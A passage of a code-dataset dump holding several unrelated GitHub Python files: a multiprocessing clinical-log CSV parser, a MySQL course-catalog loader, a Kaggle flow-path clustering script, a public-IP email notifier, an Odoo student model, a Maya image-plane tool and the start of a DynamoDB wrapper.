parser.add_argument(\"-d\",\"--dest_csv_dataset_dir_name\",action=\"append\",type=str,dest=\"op__dest_csv_dataset_dir_name\",help=\"The full directory path where the resultant CSV file will be written.\")\n parser.add_argument(\"-w\",\"--count_of_workers\",action=\"append\",type=int,dest=\"op__count_of_workers\",help=\"\"\"\n The count of workers to launch (via multiprocessing).\n \"\"\");\n \n (options)=parser.parse_args(sys.argv[1:])\n if len(sys.argv)<4:\n parser.error(\"\"\"\n ERROR: Missing required arguments\n -t, --task_formulation_timestamp_str\n This variable will contain the current timestamp in 'Ymd_HMS_f' format, for example '20180910_135822_123456'. This timestamp will be the bases of the task id of this job.\n -o, --working_dir_file_name\n The full path to the directory where temporary data will be written.\n -f, --src_csv_dataset_file_name\n The full path to the CSV file where the input dataset is to be found.\n -d, --dest_csv_dataset_dir_name\n The full directory path where the resultant CSV file will be written.\n -w, --count_of_workers\n The count of workers to launch (via multiprocessing).\n \"\"\");\n \n if(options.op__task_formulation_timestamp_str):\n task_formulation_timestamp_str=options.op__task_formulation_timestamp_str[0].strip();\n if(options.op__working_dir_file_name):\n working_dir_file_name=options.op__working_dir_file_name[0].strip();\n if(options.op__src_csv_dataset_file_name):\n src_csv_dataset_file_name=options.op__src_csv_dataset_file_name[0];\n if(options.op__dest_csv_dataset_dir_name):\n dest_csv_dataset_dir_name=options.op__dest_csv_dataset_dir_name[0];\n mkdir_p(os.path.abspath(os.path.join(dest_csv_dataset_dir_name, os.pardir)));\n mkdir_p(os.path.abspath(dest_csv_dataset_dir_name));\n if(options.op__count_of_workers):\n count_of_workers=int(options.op__count_of_workers[0]);\n\n #parser.destroy()\n except argparse.ArgumentError:\n #print help infor and exit\n usage()\n sys.exit(2)\n \n print(\"dest_csv_dataset_dir_name is:'%s'\"%(dest_csv_dataset_dir_name));\n #print(\"dest_ddl_file_name is:'%s'\"%(dest_ddl_file_name));\n logging.basicConfig(level=logging.INFO, format=LOG_FORMAT);\n \n task_formulation_timestamp=None;\n if(task_formulation_timestamp_str!=None and len(task_formulation_timestamp_str)>0):\n task_formulation_timestamp=datetime.datetime.strptime(task_formulation_timestamp_str, '%Y%m%d_%H%M%S_%f');\n else:\n task_formulation_timestamp=datetime.datetime.now();\n task_id=\"%s\"%(task_formulation_timestamp.strftime('%Y-%m-%d_%H%M%S_%f')[:-3]);#import datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[:-1]\n \n hostname=socket.gethostname().strip();\n ipAddress=getLocalIPAddress();\n pid=os.getpid();\n worker_id='%s_%s_%d'%(hostname,ipAddress,pid);\n LOGGER.info(\" '%s', -------------- hostname:'%s', ipAddress:'%s', pid:%d, worker_id:'%s', task_id:'%s'\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),hostname,ipAddress,pid,worker_id,task_id));\n LOGGER.info(\" '%s', -------------- src_csv_dataset_file_name is:'%s'\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),src_csv_dataset_file_name));\n LOGGER.info(\" '%s', -------------- dest_csv_dataset_dir_name is:'%s'\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),dest_csv_dataset_dir_name));\n LOGGER.info(\" '%s', -------------- count_of_workers is:'%s'\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),count_of_workers));\n process_list=[];\n queue_list=[];#this array will contain objects of multiprocessing.Queue (which is a near clone of queue.Queue)\n worker_list=[];\n \n try:\n for i in range(count_of_workers):\n #Instantiates the thread\n #(i) dos not make a sequence, so we use (i,)\n worker_id2='%s__%s__%d'%('BORG_DDIEM__parse_clinical_logs_CSV',worker_id,i);\n LOGGER.info(\">>>>>>>>>>worker_tag:'%s'\"%(worker_id2));\n \n worker_number=i;\n w=BORG_DDIEM__parse_clinical_logs_CSV(\n hostname,ipAddress,pid\n ,task_id\n ,task_formulation_timestamp\n ,worker_id2\n ,worker_number\n ,working_dir_file_name\n ,src_csv_dataset_file_name\n ,\"%s\"%(dest_csv_dataset_dir_name)\n );\n \"\"\"\n t=threading.Thread(\n target=run_BORG_DDIEM__parse_clinical_logs_CSV\n ,args=(\n d\n ,worker_id2\n )\n );\n thread_list.append(t);\n worker_list.append(d);\n \"\"\"\n q=multiprocessing.Queue();\n p=multiprocessing.Process(\n target=run_BORG_DDIEM__parse_clinical_logs_CSV\n ,args=(\n w\n ,q\n ,worker_id2\n )\n );\n process_list.append(p);\n queue_list.append(q);\n worker_list.append(w);\n \n for process in process_list:\n process.start();\n \n #block the current process till join() returns\n #for process in process_list:\n for i,process in enumerate(process_list):\n cont=True;\n while(cont):\n #LOGGER.info(\"============Looping, i is:%d, process_list[%d].isAlive() is:'%s'\"%(i,i,process_list[i].isAlive()));\n process.join(60);#wait for 60 seconds.\n if(process.is_alive()):\n #timout occurred on process\n cont=True;\n #LOGGER.info(\"timeout occurred on process:'%s'.\"%(worker_list[i].worker_id));\n #worker_list[i].stop();\n #worker_list[i].some_function();\n else:\n cont=False;\n #LOGGER.info(\"execution completes for process:'%s'.\"%(worker_list[i].consumer_tag));\n for i,worker in enumerate(worker_list):\n pass;\n \"\"\"\n \"\"\";\n #processing_outcome__dict=worker_list[i]._processing_outcome__dict;\n #processing_outcome__dict=worker_list[i].get_processing_outcome();\n processing_outcome__dict=queue_list[i].get();\n #LOGGER.info(\"[=]%s, %s\"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'),json.dumps(processing_outcome__dict,indent=4)));\n LOGGER.info(\"processing_outcome__dict is:'%s'\"%(json.dumps(processing_outcome__dict,indent=4)));\n worker_list[i]=None;\n worker=None;\n \n except KeyboardInterrupt:\n for i,worker in enumerate(worker_list):\n pass;\n \"\"\"\n \"\"\";\n #cleanup\n #worker.cleanup();\n if(worker_list[i]!=None):\n worker_list[i].stop();\n processing_outcome__dict=worker_list[i]._processing_outcome__dict;\n worker_list[i]=None;\n worker=None;\n worker_list=None;\n queue_list=None;\n process_list=None;\n \"\"\"\n except Exception as error:\n LOGGER.error(\"An error has been detected. Reason:'%s'\"%(error));\n worker_list=None;\n thread_list=None;\n \"\"\"\n worker_list=None;\n queue_list=None;\n process_list=None;\n\n","repo_name":"bio-ontology-research-group/DDIEM","sub_path":"website/transformers/src/py/clinical_logs_data_transformation/BORG_DDIEM__parse_clinical_logs_CSV.py","file_name":"BORG_DDIEM__parse_clinical_logs_CSV.py","file_ext":"py","file_size_in_byte":20060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29279707141","text":"import mysql.connector\nimport re\nimport csv \nfrom decouple import config\n\n\n\ndb = mysql.connector.connect(\n host= config(\"DB_HOST\"),\n user= config(\"DB_USER\"),\n password= config(\"DB_PASSWORD\"),\n database= config(\"DB_NAME\")\n)\n\ncursor=db.cursor()\ncsv_folder=\"/home/youssef/dev/projects/Advisily/repo/db/scrapper/src/csv\"\n\ndef insertCourses():\n with open(f\"{csv_folder}/courses.csv\",mode=\"r\") as csv_file:\n courses_reader=csv.DictReader(csv_file)\n\n sql='''INSERT IGNORE INTO courses(courseCode, courseTitle, prefix, credits) \n VALUES (%s,%s,%s,%s)'''\n for courseRow in courses_reader:\n\n values= list(courseRow.values())\n for i in range(len(values)):\n if(re.search(\"null\",values[i],flags=re.IGNORECASE)):values[i]=None\n\n cursor.execute(sql, values)\n\n db.commit()\n\ndef insertMajors():\n with open(f\"{csv_folder}/majors.csv\",mode=\"r\") as csv_file:\n majors_reader=csv.DictReader(csv_file)\n print(majors_reader)\n sql='''INSERT IGNORE INTO majors(majorTitle) VALUES (%s)'''\n for courseRow in majors_reader:\n majors= list(courseRow.values())\n cursor.execute(sql, majors)\n\n db.commit()\n\ndef insertMinors():\n with open(f\"{csv_folder}/minors.csv\",mode=\"r\") as csv_file:\n minors_reader=csv.DictReader(csv_file)\n sql='''INSERT IGNORE INTO minors(minorTitle) VALUES (%s)'''\n for courseRow in minors_reader:\n minors= list(courseRow.values())\n cursor.execute(sql, minors)\n\n db.commit()\n print(cursor.rowcount, \"record inserted.\")\n\ndef insertCatalogs():\n\n with open(f\"{csv_folder}/catalogs/catalogs.csv\",\"r\") as catalogs_file:\n catalogs_reader=csv.DictReader(catalogs_file)\n sql='''INSERT IGNORE INTO catalogs(year,coreCredits,concReqCredits,concElecCredits,collateralCredits,generalElecCredits,engCoreCredits,majorId)\n VALUES(%s,%s,%s,%s,%s,%s,%s,%s)'''\n\n for catalogRow in catalogs_reader:\n\n majorTitle=catalogRow.pop(\"majorTitle\")\n majorId=_get_majorId(majorTitle)\n if(majorId is None): \n continue\n catalogRow[\"majorId\"]=majorId\n\n values=list(catalogRow.values())\n cursor.execute(sql,values)\n db.commit()\n\n \n\ndef insertCourseTypes():\n with open(f\"{csv_folder}/courseTypes.csv\",\"r\") as course_types_file:\n sql=\"INSERT INTO courseTypes VALUES(%s,%s)\"\n types_reader=csv.DictReader(course_types_file)\n for typeRow in types_reader:\n cursor.execute(sql,list(typeRow.values()))\n db.commit()\n\n\ndef insertCatalogCourses():\n catalogYears=[ \"2016-2017\",\"2017-2018\",\"2018-2019\",\"2019-2020\",\"2020-2021\",\"2021-2022\"]\n insert_sql='''INSERT INTO catalogCourses(courseTypeId,catalogId,courseId)\n VALUES(%s,%s,%s)'''\n try:\n for year in catalogYears: \n with open(f\"{csv_folder}/catalogs/catalog_courses_{year}.csv\",\"r\") as catalogs_file:\n courses_reader=csv.DictReader(catalogs_file)\n\n for courseRow in courses_reader:\n temp=courseRow\n majorTitle=courseRow.pop(\"majorTitle\")\n catalogYear=courseRow.pop(\"catalogYear\")\n courseCode=courseRow.pop(\"courseCode\")\n prefix=courseRow.pop(\"prefix\")\n if(prefix==\"CSCE\" and int(courseCode)==4311): #wide area networks became computer network\n courseCode=3312\n if(prefix==\"CSCE\" and int(courseCode)==4312):\n courseCode=3313\n\n\n catalogId=_get_catalogId(catalogYear,majorTitle)\n courseId=_get_courseId_by_code_prefix(courseCode,prefix)\n if(not (catalogYear and courseId)): continue\n\n courseRow[\"catalogId\"]=catalogId\n courseRow[\"courseId\"]=courseId\n if(not catalogId):\n print(\"HERE: \",temp,majorTitle,catalogYear,courseCode)\n values=list(courseRow.values())\n cursor.execute(insert_sql,values)\n with open(f\"{csv_folder}/catalogs/catalog_core_courses.csv\",\"r\") as core_courses_file:\n courses_reader=csv.DictReader(core_courses_file)\n cursor.execute(\"SELECT catalogId from catalogs\")\n catalogIds=cursor.fetchall()\n for courseRow in courses_reader:\n courseCode=courseRow.pop(\"courseCode\")\n prefix=courseRow.pop(\"prefix\")\n courseId=_get_courseId_by_code_prefix(courseCode,prefix)\n if(not (courseId)): continue\n print(courseRow)\n for catalogId in catalogIds:\n courseRow[\"catalogId\"]=catalogId[0]\n courseRow[\"courseId\"]=courseId\n values=list(courseRow.values())\n\n cursor.execute(insert_sql,values)\n except ValueError:\n print(ValueError)\n db.commit()\n\ndef insertStandings():\n sql=\"INSERT INTO standings(standingId,standing,creditHrs) VALUES (%s,%s,%s)\"\n with open(f\"{csv_folder}/standings.csv\",\"r\") as standings_folder:\n standings_reader=csv.DictReader(standings_folder)\n for standingRow in standings_reader:\n cursor.execute(sql,list(standingRow.values()))\n db.commit()\n\n\ndef insertPaces():\n sql=\"INSERT INTO paces(paceTitle) VALUES (%s)\"\n with open(f\"{csv_folder}/paces.csv\",\"r\") as paces_folder:\n paces_reader=csv.DictReader(paces_folder)\n for paceRow in paces_reader:\n cursor.execute(sql,list(paceRow.values()))\n db.commit()\n\ndef insertRequisiteTypes():\n sql=\"INSERT INTO requisiteTypes(requisiteTypeId,requisiteType) VALUES (%s, %s)\"\n with open(f\"{csv_folder}/requisites/requisiteTypes.csv\",\"r\") as requisite_types_folder:\n requisite_types_reader=csv.DictReader(requisite_types_folder)\n for typeRow in requisite_types_reader:\n cursor.execute(sql,list(typeRow.values()))\n db.commit()\n\ndef insertPlans():\n insert_sql=\"INSERT INTO planCourses(semesterNumber,catalogId,courseId) VALUES (%s, %s,%s)\"\n # plan_years=[\"2016-2017\",\"2017-2018\",\"2018-2019\",\"2019-2020\",\"2020-2021\"]\n plan_years=[\"2020-2021\"]\n plan_majors=[\"cs\"]\n try:\n for major in plan_majors: \n for year in plan_years:\n with open(f\"{csv_folder}/plans/plan_{major}_{year}.csv\",\"r\") as plans_folder:\n plans_reader=csv.DictReader(plans_folder)\n err=False\n for planRow in plans_reader:\n catalogYear=planRow.pop(\"catalogYear\")\n majorTitle=planRow.pop(\"majorTitle\")\n prefix=planRow.pop(\"prefix\")\n courseCode=planRow.pop(\"courseCode\")\n\n catalogId=_get_catalogId(catalogYear,majorTitle)\n courseId=_get_courseId_by_code_prefix(courseCode,prefix)\n if(not (catalogId and courseId)):\n err=True\n # print(f\"{catalogId} {courseId}, {prefix}\\n{planRow} {courseCode}\")\n break\n planRow[\"catalogId\"]=catalogId\n planRow[\"courseId\"]=courseId\n cursor.execute(insert_sql,list(planRow.values()))\n if(not err):\n db.commit()\n print(cursor.rowcount, \"plans inserted sucessfully\")\n else: print(\" didn't insert plans with caalogId & courseId=\",catalogId,courseId,courseCode)\n except ValueError:\n print(ValueError)\n\n\n\n\ndef _get_majorId(majorTitle):\n sql = \"SELECT majorId from majors WHERE majorTitle LIKE %s LIMIT 1\"\n majorTitle=\"%\"+majorTitle+\"%\"\n \n cursor.execute(sql,[majorTitle])\n majorId=cursor.fetchone()\n return majorId[0] if majorId else None\n\ndef _get_catalogId(catalogYear,majorTitle):\n majorId= _get_majorId(majorTitle)\n if(not majorId): return None\n sql=\"SELECT catalogId from catalogs WHERE year LIKE %s AND majorId= %s LIMIT 1\"\n cursor.execute(sql,[catalogYear,majorId])\n catalogId=cursor.fetchone()\n return catalogId[0] if catalogId else None\n\ndef _get_courseId_by_code_prefix(courseCode,prefix):\n print(courseCode,prefix)\n sql=\"SELECT courseId from courses WHERE courseCode= %s AND prefix = %s LIMIT 1\"\n cursor.execute(sql,[courseCode,prefix])\n courseId=cursor.fetchone()\n return courseId[0] if courseId else None\n\ndef _get_courseId_by_title(courseTitle):\n courseTitleLike= \"%\"+courseTitle+\"%\"\n sql=\"SELECT courseId from courses WHERE courseTitle= %s or courseTitle LIKE %s LIMIT 1\"\n cursor.execute(sql,[courseTitle,courseTitleLike])\n courseId=cursor.fetchone()\n return courseId[0] if courseId else None\n\n\ndef insertCourseRequites():\n sql='''INSERT INTO courseRequisites(setId,courseId) \n VALUES(%s,%s)\n '''\n with open(f\"{csv_folder}/requisites/courseRequisites.csv\",\"r\") as requisites_folder:\n requisites_reader=csv.DictReader(requisites_folder)\n for requisiteRow in requisites_reader:\n prefix=requisiteRow.pop('prefix')\n courseCode=requisiteRow.pop('courseCode')\n courseId=_get_courseId_by_code_prefix(courseCode,prefix)\n requisiteRow[\"courseId\"]=courseId\n print(requisiteRow)\n cursor.execute(sql,list(requisiteRow.values()))\n db.commit()\n\n\ndef insertRequisiteSets():\n sql='''INSERT INTO requisiteSets(setId,requisiteTypeId,requisiteId) \n VALUES(%s,%s,%s)\n '''\n with open(f\"{csv_folder}/requisites/requisiteSets.csv\",\"r\") as requisites_folder:\n requisites_reader=csv.DictReader(requisites_folder)\n for requisiteRow in requisites_reader:\n prefix=requisiteRow.pop('requisitePrefix')\n courseCode=requisiteRow.pop('requisiteCode')\n requisiteCourseId=_get_courseId_by_code_prefix(courseCode,prefix)\n requisiteRow[\"requisiteId\"]=requisiteCourseId\n print(requisiteRow)\n cursor.execute(sql,list(requisiteRow.values()))\n db.commit()\n\n\n# insertStandings()\n# insertMajors()\n# insertMinors()\n# insertCourses()\n# insertRequisiteTypes()\n# insertCourseTypes()\n# insertCatalogs()\n# insertPaces()\ninsertPlans()\n# insertCatalogCourses()\n\n# insertCourseRequites()\n# insertRequisiteSets()","repo_name":"Youssef-Agiza/Advisily","sub_path":"db/scrapper/src/sql/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":10744,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"2370335245","text":"import sys\r\n\r\ndef get_flow_path(iterable):\r\n return tuple([idx for idx, element in enumerate(iterable) if element != \"\"])\r\n\r\nnumeric=\"../input/train_numeric.csv\"\r\ncategorical=\"../input/train_categorical.csv\"\r\n#\r\n#\r\n# Question 1: Are there any meaningful clusters by the measured features?\r\n# An interesting extension to this is to see if the features are unique to the line and station they are measured at...\r\n# ... this is left by the author as an exercise to the reader.\r\n#\r\n#\r\n\r\nflow_paths = {}\r\nwith open(numeric, \"r\") as n:\r\n with open(categorical, \"r\") as c:\r\n n.readline()\r\n c.readline()\r\n counter = 0\r\n for n_row, c_row in zip(n, c):\r\n counter += 1\r\n if counter % 1000 == 0:\r\n print(\"processing_row: {}\".format(counter))\r\n n_row = n_row.strip()\r\n c_row = c_row.strip()\r\n n_id, n_row = n_row.split(\",\")[0], n_row.split(\",\")[1:]\r\n c_id, c_row = c_row.split(\",\")[0], c_row.split(\",\")[1:]\r\n assert(n_id == c_id)\r\n idx = n_id\r\n whole_row = n_row + c_row\r\n fp = get_flow_path(whole_row)\r\n if fp in flow_paths.keys():\r\n flow_paths[fp].append(idx)\r\n else:\r\n flow_paths[fp] = [idx]\r\n\r\n#\r\n#\r\n# Question 2: How big are the clusters generated by this grouping method?\r\n# What is the error rate per cluster...\r\n# ... This potentially interesting result is also left as an exercise to the reader ...\r\n#\r\n#\r\n\r\nimport json\r\nwith open(\"flow_path.json\", \"w\") as fout:\r\n for key, value in flow_paths.items():\r\n fout.write(str(key) + \",\" + str(value)+\"\\n\")\r\n\r\n\r\nimport matplotlib.pyplot as plt\r\nflow_path_length = [len(value) for key, value in flow_paths.items()]\r\nflow_path_length.sort()\r\nx_values = list(range(len(flow_path_length)))\r\nplt.plot(x_values, flow_path_length)\r\nplt.title(\"Show the cluster sizes\")\r\nplt.savefig(\"cluster_sizes.png\")\r\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/bosch-production-line-performance/Melvyn Drag/feature-clusters.py","file_name":"feature-clusters.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"26202376732","text":"import os\nimport urllib2\nimport json\n\n# read latest ip from file\nip1 = open('ip.txt', 'r').read()\n#print ip1\n\n# get current ip\nresponse = urllib2.urlopen('https://api.ipify.org?format=json')\nip2 = json.load(response)\nip2 = ip2['ip']\n#print ip2\n\n# compare ip's and send email if ip has changed\nif ip1 == ip2:\n 1 == 1\n #print \"they are the same\"\nelse:\n f = open(\"ip.txt\",\"w\")\n f.write(str(ip2))\n f.close()\n #print \"different\"\n os.system(\"echo \\\" %s \\\" | mail -s \\\"mokkula\\\" CHANGE@saunalahti.fi\" % ip2)\n","repo_name":"artturig/ipsender","sub_path":"ipsender.py","file_name":"ipsender.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4586427180","text":"from odoo import models, fields, api\n\n\nclass Student(models.Model):\n _inherit = 'ix.student' \n\n attendance_line_absent_ids = fields.One2many(comodel_name='ixlms.attendance.line', compute='_attendance_line_absent_ids', string='Missed Classes')\n earned_sch = fields.Integer(compute='_sch', string='Earned Credits')\n remaining_sch = fields.Integer(compute='_sch', string='Remaining Credits')\n progress = fields.Float(string='Progress Towards Degree', compute='_sch')\n on_probation = fields.Boolean(string='On Probation', default=False, tracking=True) \n \n\n def _sch(self):\n for rec in self:\n earned_sch = 0\n for enrollment in rec.enrollment_ids:\n if enrollment.state == 'completed' and enrollment.passed:\n earned_sch += enrollment.course_id.sch\n rec.earned_sch = earned_sch\n rec.remaining_sch = rec.program_sch - earned_sch\n if rec.program_sch == 0:\n rec.progress = 0\n else:\n rec.progress = float(rec.earned_sch) * 100 / rec.program_sch\n\n def _attendance_line_absent_ids(self):\n for rec in self:\n rec.attendance_line_absent_ids = self.env['ixlms.attendance.line'].search([\n ('student_id', '=', rec.id), ('state', '=', 'absent')])\n \n ","repo_name":"oiraqi/academix","sub_path":"ixlms/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"71936310243","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport maya.cmds\n\nimport mmSolver.logger\nimport mmSolver.api as mmapi\nimport mmSolver.utils.camera as camera_utils\nimport mmSolver.utils.python_compat as pycompat\n\nimport mmSolver.tools.createimageplane.constant as const\nimport mmSolver.tools.createimageplane._lib.constant as lib_const\nimport mmSolver.tools.createimageplane._lib.utilities as lib_utils\nimport mmSolver.tools.createimageplane._lib.shader as lib_shader\nimport mmSolver.tools.createimageplane._lib.mmimageplane as lib_mmimageplane\nimport mmSolver.tools.createimageplane._lib.polyplane as lib_polyplane\nimport mmSolver.tools.createimageplane._lib.nativeimageplane as lib_nativeimageplane\n\nLOG = mmSolver.logger.get_logger()\n\n\ndef create_image_plane_on_camera(cam, name=None):\n \"\"\"Create an Image Plane that can be distorted in Maya's viewport\n (realtime).\n \"\"\"\n if name is None:\n name = 'mmImagePlane1'\n assert isinstance(cam, mmapi.Camera)\n assert isinstance(name, pycompat.TEXT_TYPE)\n cam_tfm = cam.get_transform_node()\n cam_shp = cam.get_shape_node()\n\n mm_ip_tfm = lib_mmimageplane.create_transform_node(name, cam_tfm, cam_shp)\n\n poly_plane_name = name + 'MeshShape'\n poly_plane_network = lib_polyplane.create_poly_plane(\n poly_plane_name, mm_ip_tfm, cam_shp\n )\n\n name_shade = name + 'Shader'\n shader_network = lib_shader.create_network(name_shade, mm_ip_tfm)\n\n name_img_shp = name + 'Shape'\n mm_ip_shp = lib_mmimageplane.create_shape_node(\n name_img_shp, mm_ip_tfm, cam_shp, poly_plane_network, shader_network\n )\n\n # Shortcut connections to nodes.\n lib_utils.force_connect_attr(\n shader_network.file_node + '.message', mm_ip_tfm + '.shaderFileNode'\n )\n\n # Logic to calculate the frame number.\n frame_expr = const.FRAME_EXPRESSION.format(node=mm_ip_shp)\n frame_expr = frame_expr.replace('{{', '{')\n frame_expr = frame_expr.replace('}}', '}')\n maya.cmds.expression(string=frame_expr)\n\n # Show the users the final frame number.\n shp_node_attr = mm_ip_shp + '.imageSequenceFrameOutput'\n maya.cmds.setAttr(shp_node_attr, lock=True)\n\n # Set useFrameExtension temporarily. Setting useFrameExtension to\n # False causes frameOffset to be locked (but we need to edit it).\n is_seq = maya.cmds.getAttr(shader_network.file_node + '.useFrameExtension')\n maya.cmds.setAttr(shader_network.file_node + '.useFrameExtension', True)\n\n file_node_attr = shader_network.file_node + '.frameExtension'\n lib_utils.force_connect_attr(shp_node_attr, file_node_attr)\n maya.cmds.setAttr(file_node_attr, lock=True)\n\n maya.cmds.setAttr(shader_network.file_node + '.useFrameExtension', is_seq)\n\n # Image sequence.\n image_sequence_path = lib_utils.get_default_image_path()\n set_image_sequence(mm_ip_tfm, image_sequence_path)\n return mm_ip_tfm, mm_ip_shp\n\n\ndef convert_image_planes_on_camera(cam):\n \"\"\"Create an Image Plane that can be distorted in Maya's viewport\n (realtime).\n \"\"\"\n assert isinstance(cam, mmapi.Camera)\n\n # Find image plane currently on the camera.\n cam_tfm = cam.get_transform_node()\n cam_shp = cam.get_shape_node()\n image_planes = camera_utils.get_image_plane_shapes_from_camera(cam_tfm, cam_shp)\n\n ip_node_pairs = []\n for native_ip_shp in image_planes:\n # Convert Maya image plane into a polygon image plane.\n name = 'mmImagePlane1'\n mm_ip_tfm = lib_mmimageplane.create_transform_node(name, cam_tfm, cam_shp)\n\n poly_plane_name = name + 'MeshShape'\n poly_plane_network = lib_polyplane.create_poly_plane(\n poly_plane_name, mm_ip_tfm, cam_shp\n )\n\n lib_nativeimageplane.copy_depth_value(mm_ip_tfm, native_ip_shp)\n\n name_shader = name + 'Shader'\n shader_network = lib_shader.create_network(name_shader, mm_ip_tfm)\n\n name_img_shp = name + 'Shape'\n mm_ip_shp = lib_mmimageplane.create_shape_node(\n name_img_shp, mm_ip_tfm, cam_shp, poly_plane_network, shader_network\n )\n\n # Disable/hide the Maya image plane.\n maya.cmds.setAttr(native_ip_shp + '.displayMode', 0) # 0 = 'None' mode\n maya.cmds.setAttr(native_ip_shp + '.type', 1) # 1 = 'Texture' mode.\n maya.cmds.setAttr(native_ip_shp + '.visibility', False)\n\n ip_node_pairs.append((mm_ip_tfm, mm_ip_shp))\n\n return ip_node_pairs\n\n\ndef set_image_sequence(mm_image_plane_node, image_sequence_path, attr_name=None):\n if attr_name is None:\n attr_name = lib_const.DEFAULT_IMAGE_SEQUENCE_ATTR_NAME\n\n tfm, shp = lib_mmimageplane.get_image_plane_node_pair(mm_image_plane_node)\n if tfm is None or shp is None:\n LOG.warn('mmImagePlane transform/shape could not be found.')\n\n file_node = lib_mmimageplane.get_file_node(tfm)\n if file_node is None:\n LOG.warn('mmImagePlane shader file node is invalid.')\n\n if shp is not None:\n lib_mmimageplane.set_image_sequence(shp, image_sequence_path, attr_name)\n if file_node is not None:\n lib_shader.set_file_path(file_node, image_sequence_path)\n return\n","repo_name":"david-cattermole/mayaMatchMoveSolver","sub_path":"python/mmSolver/tools/createimageplane/_lib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"14924847698","text":"from __future__ import print_function\n\nimport os\nimport boto3\nimport json\nimport decimal\nimport time\n\nimport database.database_configuration as config\n\nfrom botocore.exceptions import ClientError\nfrom boto3.dynamodb.conditions import Key, Attr\n\nclass DecimalEncoder(json.JSONEncoder):\n \"\"\"\n DecimalEncoder:\n A helper class found in the AWS docs that converts a DynamoDB item to JSON\n \"\"\"\n def default(self, o):\n if isinstance(o, decimal.Decimal):\n if o % 1 > 0:\n return float(o)\n else:\n return int(o)\n return super(DecimalEncoder, self).default(o)\n\nclass DatabaseManager:\n \n \"\"\"\n DatabaseManager:\n Singleton wrapper for DatabaseConnection\n \"\"\"\n\n instance = None\n debug = False\n\n @staticmethod\n def getInstance():\n \"\"\"Get the instance of DatabaseConnection\"\"\"\n if DatabaseManager.instance is None:\n DatabaseManager.__initializeInstance()\n \n return DatabaseManager.instance\n\n @staticmethod\n def __initializeInstance():\n env = os.getenv('DB_ENV', 'local')\n if env != 'prod' and env != 'local':\n env = 'local'\n\n DatabaseManager.instance = DatabaseManager.__DatabaseConnection(env)\n\n @staticmethod\n def toggleDebugMessages(debug):\n if DatabaseManager.instance is None:\n DatabaseManager.__initializeInstance()\n\n DatabaseManager.instance.toggleDebugMessages(debug)\n\n class __DatabaseConnection:\n \n \"\"\"\n DatabaseConnection:\n Handles interactions with an AWS DynamoDB instance.\n \"\"\"\n\n def __init__(self, env, debug=False):\n self.dynamoDb = boto3.resource('dynamodb', endpoint_url=config.dbenv[env]['endpoint_url'], region_name='ca-central-1')\n self.env = env # used to check permissions with deleting tables\n self.debug = debug\n\n def toggleDebugMessages(self, debug):\n self.debug = debug\n\n def log(self, *content):\n if self.debug:\n print(*content)\n\n def get_table(self, table_name):\n \"\"\"\n Returns a table object for the given table_name.\n *Note: this table might not exist. Use table_exists before get_table.\n \"\"\"\n return self.dynamoDb.Table(table_name)\n\n def table_exists(self, table_name):\n \"\"\"\n Checks if a table with the given name exists.\n Returns true if a table with the given table_name exists, false otherwise,\n \"\"\"\n return self.get_table(table_name) in self.dynamoDb.tables.all()\n\n def create_table(self, table_name):\n \"\"\"\n Creates a table with the given name.\n The table's key will be 'id' with type 'Number'.\n Returns:\n true if the table was created.\n false if the table existed before or if the table failed to be created.\n \"\"\"\n \n if self.table_exists(table_name):\n self.log('Table:', table_name,' already exists!')\n return False\n table = self.dynamoDb.create_table(\n TableName=table_name,\n KeySchema=[\n {\n 'AttributeName': 'id',\n 'KeyType': 'HASH'\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'N'\n },\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': config.read_capacity_units,\n 'WriteCapacityUnits': config.write_capacity_units\n }\n )\n\n success = self.table_exists(table_name)\n\n if success:\n self.log('Table',table_name,'created!')\n\n return success\n\n def delete_table(self, table_name):\n \"\"\"\n Deletes the table with the given name.\n\n Returns:\n 0: Successfully deleted the table.\n -1: Not allowed to delete the table.\n -2: Table does not exist.\n -3: Other error.\n \"\"\"\n if self.env == 'prod':\n self.log('You can\\'t delete a database in prod')\n return -1\n elif not self.table_exists(table_name):\n self.log('Table:', table_name, 'does not exist!')\n return -2\n else:\n try:\n self.log('Deleting table:', table_name)\n\n self.get_table(table_name).delete()\n time.sleep(5) #allow for deletion\n\n self.log('Table:', table_name, 'deleted!')\n return 0\n except ClientError as e:\n print('Failed to delete table:', table_name)\n print('Error:', e.response['Error']['Message'])\n return -3\n\n def get_item(self, table_name, key):\n \"\"\" Gets the item with the given key from the given table \"\"\"\n try:\n response = self.get_table(table_name).get_item(\n Key={\n 'id': key\n }\n )\n return response.get('Item')\n\n except ClientError as e:\n print('Failed to get item:', key)\n print('Error:', e.response['Error']['Message'])\n\n def put_item(self, table_name, item):\n \"\"\"\n If an item with no id attribute or an id of -1, this will create a new item.\n If item already exists (same key), then this will delete and create a new item.\n \"\"\"\n\n #This is a hack\n #if item doesn't have an idea, it tries to get the next available id\n #should probably change the id in that case to something we can determine on our own\n if not 'id' in item or item['id'] == -1:\n item['id'] = self.get_max_primarykey(table_name)\n\n try:\n response = self.get_table(table_name).put_item(\n Item=item\n )\n return 